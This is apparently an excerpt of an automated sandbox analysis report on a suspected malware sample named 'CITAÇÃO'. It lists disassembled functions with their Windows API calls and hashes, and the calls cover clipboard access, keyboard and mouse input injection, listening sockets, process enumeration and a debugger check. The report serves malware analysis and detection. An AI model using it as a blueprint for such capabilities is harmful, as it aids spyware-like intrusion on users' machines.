                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Resource$FindLoadLock__swprintf$Sizeof__wcsicoll
                                                      • String ID:
                                                      • API String ID: 1158019794-0
                                                      • Opcode ID: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                                                      • Instruction ID: 48d2d5a3af9b637b7fc6f2c6b5a7fdd3517197a5f8dc2ef3994740021b7ed835
                                                      • Opcode Fuzzy Hash: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                                                      • Instruction Fuzzy Hash: C741F1322002146BDB10EF65EC84FAB37ADEB89321F00846BFD01C6245E779DA51C7A8
                                                      Function 0045A10F Relevance: 16.6, APIs: 11, Instructions: 120clipboardmemoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                      • String ID:
                                                      • API String ID: 1737998785-0
                                                      • Opcode ID: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                                                      • Instruction ID: d84b136cee2c902db59abfe4f82a3f409d39725fe24efd6a62fd8a04edebb5dd
                                                      • Opcode Fuzzy Hash: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                                                      • Instruction Fuzzy Hash: 334114726001119FC310EFA5EC89B5EB7A4FF54315F00856EF909EB3A1EB75A941CB88
                                                      Function 0045D619 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 107COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetErrorMode.KERNEL32(00000001), ref: 0045D627
                                                      • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,?), ref: 0045D6B5
                                                      • GetLastError.KERNEL32 ref: 0045D6BF
                                                      • SetErrorMode.KERNEL32(00000000,?), ref: 0045D751
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Error$Mode$DiskFreeLastSpace
                                                      • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                      • API String ID: 4194297153-14809454
                                                      • Opcode ID: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                                                      • Instruction ID: 1f300c266cb1daf6abeae651b696e439ee3a0372042695327ab67fb83666ce96
                                                      • Opcode Fuzzy Hash: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                                                      • Instruction Fuzzy Hash: FE418235D00209DFCB10EFA5C884A9DB7B4FF48315F10846BE905AB352D7799A85CB69
                                                      Function 0044EB59 Relevance: 12.9, APIs: 3, Strings: 4, Instructions: 645COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: _memmove$_strncmp
                                                      • String ID: @oH$\$^$h
                                                      • API String ID: 2175499884-3701065813
                                                      • Opcode ID: f002cf83b61508de9c211a0f0d172e3a132fb63b457bb46fdb7389c8079d7204
                                                      • Instruction ID: d0725f23cfd3ca281eac06f76a82abe5967bc3f30214560d9089fed7748fa16d
                                                      • Opcode Fuzzy Hash: f002cf83b61508de9c211a0f0d172e3a132fb63b457bb46fdb7389c8079d7204
                                                      • Instruction Fuzzy Hash: C642E270E04249CFEB14CF69C8806AEBBF2FF85304F2481AAD855AB351D7399946CF55
                                                      Function 004652BE Relevance: 12.1, APIs: 8, Instructions: 97networkCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 0046530D
                                                      • WSAGetLastError.WSOCK32(00000000), ref: 0046531C
                                                      • bind.WSOCK32(00000000,?,00000010), ref: 00465356
                                                      • WSAGetLastError.WSOCK32(00000000), ref: 00465363
                                                      • closesocket.WSOCK32(00000000,00000000), ref: 00465377
                                                      • listen.WSOCK32(00000000,00000005), ref: 00465381
                                                      • WSAGetLastError.WSOCK32(00000000), ref: 004653A9
                                                      • closesocket.WSOCK32(00000000,00000000), ref: 004653BD
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$closesocket$bindlistensocket
                                                      • String ID:
                                                      • API String ID: 540024437-0
                                                      • Opcode ID: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                                                      • Instruction ID: 689f190a2b8ca197395c4559ba4ec64c13dad074e2778b61c05f6be918bdb8b0
                                                      • Opcode Fuzzy Hash: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                                                      • Instruction Fuzzy Hash: A8319331200500ABD310EF25DD89B6EB7A8EF44725F10866EF855E73D1DBB4AC818B99
                                                      Function 0044663B Relevance: 11.4, APIs: 1, Strings: 5, Instructions: 895COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: ERCP$VUUU$VUUU$VUUU$XjH
                                                      • API String ID: 0-2872873767
                                                      • Opcode ID: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                                                      • Instruction ID: d175e7d0ae6fb3d700f9da8fb6b70819649eb02c4ceaf458d011f7582104736e
                                                      • Opcode Fuzzy Hash: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                                                      • Instruction Fuzzy Hash: D772D871A042198BEF24CF58C8807AEB7F1EB42314F25829BD859A7380D7799DC5CF5A
                                                      Function 004755C4 Relevance: 10.6, APIs: 7, Instructions: 148processCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 00475608
                                                      • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00475618
                                                      • __wsplitpath.LIBCMT ref: 00475644
                                                        • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                      • _wcscat.LIBCMT ref: 00475657
                                                      • __wcsicoll.LIBCMT ref: 0047567B
                                                      • Process32NextW.KERNEL32(00000000,?), ref: 004756AB
                                                      • CloseHandle.KERNEL32(00000000), ref: 004756BA
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
                                                      • String ID:
                                                      • API String ID: 2547909840-0
                                                      • Opcode ID: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                                                      • Instruction ID: 52239f647ae7113ca4c6e3167181772f82882466072c53a1302db900a9aecbbd
                                                      • Opcode Fuzzy Hash: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                                                      • Instruction Fuzzy Hash: B3518671900618ABDB10DF55CD85FDE77B8EF44704F1084AAF509AB282DA75AF84CF68
                                                      Function 00452492 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 128filesleepCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                      • FindFirstFileW.KERNEL32(?,?), ref: 004524DF
                                                      • Sleep.KERNEL32(0000000A), ref: 0045250B
                                                      • FindNextFileW.KERNEL32(?,?), ref: 004525E9
                                                      • FindClose.KERNEL32(?), ref: 004525FF
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Find$File$CloseFirstNextSleep_memmove_wcslen
                                                      • String ID: *.*$\VH
                                                      • API String ID: 2786137511-2657498754
                                                      • Opcode ID: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                                                      • Instruction ID: de376bcde865418ddd8e10142a6165d1fec8b8ecf5afc9fd422e88b207ce0255
                                                      • Opcode Fuzzy Hash: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                                                      • Instruction Fuzzy Hash: 37417F7190021DABDB14DF64CD58AEE77B4AF49305F14445BEC09A3281E678EE49CB98
                                                      Function 0041A208 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 58COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • IsDebuggerPresent.KERNEL32 ref: 00421FC1
                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00421FD6
                                                      • UnhandledExceptionFilter.KERNEL32(pqI), ref: 00421FE1
                                                      • GetCurrentProcess.KERNEL32(C0000409), ref: 00421FFD
                                                      • TerminateProcess.KERNEL32(00000000), ref: 00422004
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                      • String ID: pqI
                                                      • API String ID: 2579439406-2459173057
                                                      • Opcode ID: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                                                      • Instruction ID: 2caf929301e55fbdfba35cdc3931bb3174c20cf3198a7c5bb5494214f042e870
                                                      • Opcode Fuzzy Hash: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                                                      • Instruction Fuzzy Hash: 9E21CDB45392059FCB50DF65FE456483BA4BB68304F5005BBF90987371E7B969818F0D
                                                      Function 0043333C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • __wcsicoll.LIBCMT ref: 00433349
                                                      • mouse_event.USER32(00000800,00000000,00000000,00000078,00000000), ref: 0043335F
                                                      • __wcsicoll.LIBCMT ref: 00433375
                                                      • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 0043338B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: __wcsicollmouse_event
                                                      • String ID: DOWN
                                                      • API String ID: 1033544147-711622031
                                                      • Opcode ID: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                                                      • Instruction ID: c5effa3e7e2998e6ee15a8e10ce6e2e5d36a5fc043d4170c53cc9f091e4fe068
                                                      • Opcode Fuzzy Hash: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                                                      • Instruction Fuzzy Hash: 78F0A0726846103AF80026947C02EFB334C9B26767F004023FE0CD1280EA59290557BD
                                                      Function 0044C37A Relevance: 7.6, APIs: 5, Instructions: 145windowkeyboardCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetKeyboardState.USER32(?), ref: 0044C3D2
                                                      • SetKeyboardState.USER32(00000080), ref: 0044C3F6
                                                      • PostMessageW.USER32(00000000,00000101,?,?), ref: 0044C43A
                                                      • PostMessageW.USER32(00000000,00000105,?,?), ref: 0044C472
                                                      • SendInput.USER32(00000001,?,0000001C), ref: 0044C4FF
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: KeyboardMessagePostState$InputSend
                                                      • String ID:
                                                      • API String ID: 3031425849-0
                                                      • Opcode ID: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                                                      • Instruction ID: ca9f4cb769efad0e1be190fe8763212e5a79bd7c4ee8908ff6f5a5d8a4a0dc9b
                                                      • Opcode Fuzzy Hash: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                                                      • Instruction Fuzzy Hash: 4D415D755001082AEB109FA9DCD5BFFBB68AF96320F04815BFD8456283C378D9518BF8
                                                      Function 00476619 Relevance: 7.6, APIs: 5, Instructions: 140networkCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                                                      • socket.WSOCK32(00000002,00000002,00000011,?,00000000), ref: 0047666F
                                                      • WSAGetLastError.WSOCK32(00000000), ref: 00476692
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: ErrorLastinet_addrsocket
                                                      • String ID:
                                                      • API String ID: 4170576061-0
                                                      • Opcode ID: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
                                                      • Instruction ID: b6cffcacb6afaf0b8cd9bee7f3c7ce362d61c656181a10c6507bcc72ef542d5a
                                                      • Opcode Fuzzy Hash: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
                                                      • Instruction Fuzzy Hash: 604129326002005BD710EF39DC86F5A73D59F44728F15866FF944AB3C2DABAEC418799
                                                      Function 0047A330 Relevance: 7.6, APIs: 5, Instructions: 71windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                      • IsWindowVisible.USER32 ref: 0047A368
                                                      • IsWindowEnabled.USER32 ref: 0047A378
                                                      • GetForegroundWindow.USER32(?,?,?,00000001), ref: 0047A385
                                                      • IsIconic.USER32 ref: 0047A393
                                                      • IsZoomed.USER32 ref: 0047A3A1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                      • String ID:
                                                      • API String ID: 292994002-0
                                                      • Opcode ID: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
                                                      • Instruction ID: 143e3079ffab126fd184b85051f6534cdea6adf6d01d93e69c1b4810180b6228
                                                      • Opcode Fuzzy Hash: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
                                                      • Instruction Fuzzy Hash: 8F11A2322001119BE3219F2ADC05B9FB798AF80715F15842FF849E7250DBB8E85187A9
                                                      Function 0046DC80 Relevance: 6.1, APIs: 4, Instructions: 70clipboardCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • OpenClipboard.USER32(?), ref: 0046DCE7
                                                      • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                                                      • GetClipboardData.USER32(0000000D), ref: 0046DD01
                                                      • CloseClipboard.USER32 ref: 0046DD0D
                                                      • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                                                      • CloseClipboard.USER32 ref: 0046DD41
                                                      • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                                                      • GetClipboardData.USER32(00000001), ref: 0046DD8D
                                                      • CloseClipboard.USER32 ref: 0046DD99
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                                                      • String ID:
                                                      • API String ID: 15083398-0
                                                      • Opcode ID: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
                                                      • Instruction ID: df02eb04a95629b292fb88db9571ebb8a4b5ed240788a0c572d8156b6d3d2bc0
                                                      • Opcode Fuzzy Hash: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
                                                      • Instruction Fuzzy Hash: 1A0128326042416BC311BBB99C8596E7B64EF4A324F04097FF984A72C1EB74A912C3A9
                                                      Function 0044F430 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 458COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1779900453.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1779848659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1779985735.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780005188.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780057028.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780079950.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1780156112.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_CITA#U00c7#U00c3O.jbxd
                                                      Similarity
                                                      • API ID: _memmove
                                                      • String ID: U$\
                                                      • API String ID: 4104443479-100911408
